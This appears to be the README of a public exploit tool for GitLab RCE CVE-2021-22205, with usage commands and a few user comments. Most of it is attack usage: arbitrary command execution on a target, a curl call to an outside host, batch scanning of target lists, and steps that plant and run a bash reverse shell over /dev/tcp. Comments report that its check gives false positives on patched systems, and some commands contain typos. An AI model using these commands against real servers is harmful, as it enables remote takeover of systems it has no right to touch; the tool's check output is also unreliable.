CVE-2021-22205& GitLab CE/EE RCE

Vuln Impact

An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser which resulted in a remote command execution.

Vuln Product

Gitlab CE/EE < 13.10.3
Gitlab CE/EE < 13.9.6
Gitlab CE/EE < 13.8.8

Environment

export GITLAB_HOME=/srv/gitlab

sudo docker run --detach \
  --hostname gitlab.example.com \
  --publish 443:443 --publish 80:80 \
  --name gitlab \
  --restart always \
  --volume $GITLAB_HOME/config:/etc/gitlab \
  --volume $GITLAB_HOME/logs:/var/log/gitlab \
  --volume $GITLAB_HOME/data:/var/opt/gitlab \
  gitlab/gitlab-ce:13.9.1-ce.0

Vunl Check

Basic usage

python3 CVE-2021-2205.py

Vuln check

python3 CVE-2021-2205.py -v true -t http://gitlab.example.com

command execute

python3 CVE-2021-2205.py -a true -t http://gitlab.example.com -c "curl http://192.168.59.1:1234/1.txt"

python3 CVE-2021-2205.py -a true -t http://gitlab.example.com -c "echo 'Attacked by Al1ex!!!' > /tmp/1.txt"

batch scan

python3 CVE-2021-2205.py -s true -f target.txt

Reserve Shell

python3 CVE-2021-2205.py -a true -t http://gitlab.example.com -c "echo 'bash -i >& /dev/tcp/ip/port 0>&1' > /tmp/1.sh"

python3 CVE-2021-2205.py -a true -t http://gitlab.example.com -c "chmod +x /tmp/1.sh"

python3 CVE-2021-2205.py -a true -t http://gitlab.example.com -c "/bin/bahs /tmp/1.sh"

Reference

https://github.com/mr-r3bot/Gitlab-CVE-2021-22205

https://devcraft.io/2021/05/04/exiftool-arbitrary-code-execution-cve-2021-22204.html

根据这个链接的回复，在更新 Gitlab 环境中的 ExifTool 版本至修复版本后，就能避免此问题。

我在我的环境中通过这个方式修复后，再通过链接开头所述的 POC，验证，发现已经无法执行图片中所隐藏的命令。

但是修复后，我的环境通过本 repo 的 POC 进行验证，发现还会报“目标存在漏洞”。

通过查看该 repo 的 POC 代码，发现是通过上传图片后，判断 http 响应中是否存在 Failed to process image 来确定是否存在漏洞。实际上，修复后的环境上传 POC 图片仍然会是报 Failed to process image，但隐藏命令不会被执行

Hi, follow your tutorial, I compose a docker container and then exploit it. Then I got an error. I wonder why this happen. Thanks.

$ python CVE-2021-22205.py -a true -t http://ip172-18-0-67-c5tpmgfnjsv000d1q4g0-80.direct.labs.play-with-docker.com -c whoami

          ______     _______     ____   ___ ____  _      ____  ____  ____   ___  ____
         / ___\ \   / / ____|   |___ \ / _ \___ \/ |    |___ \|___ \|___ \ / _ \| ___|
        | |    \ \ / /|  _| _____ __) | | | |__) | |_____ __) | __) | __) | | | |___ \
        | |___  \ V / | |__|_____/ __/| |_| / __/| |_____/ __/ / __/ / __/| |_| |___) |
        \____ |  \_/  |_____|   |_____|\___/_____|_|    |_____|_____|_____|\___/|____/

                                        Author:Al1ex@Heptagram
                                Github:https://github.com/Al1ex


        验证模式：python CVE-2021-22205.py -v true -t target_url
        攻击模式：python CVE-2021-22205.py -a true -t target_url -c command
        批量检测：python CVE-2021-22205.py -s true -f file

list index out of range

this is what i get:

python3 CVE-2021-22205.py File "CVE-2021-22205.py", line 38 "X-CSRF-Token": f"{token}", "Accept-Encoding": "gzip, deflate"} ^ SyntaxError: invalid syntax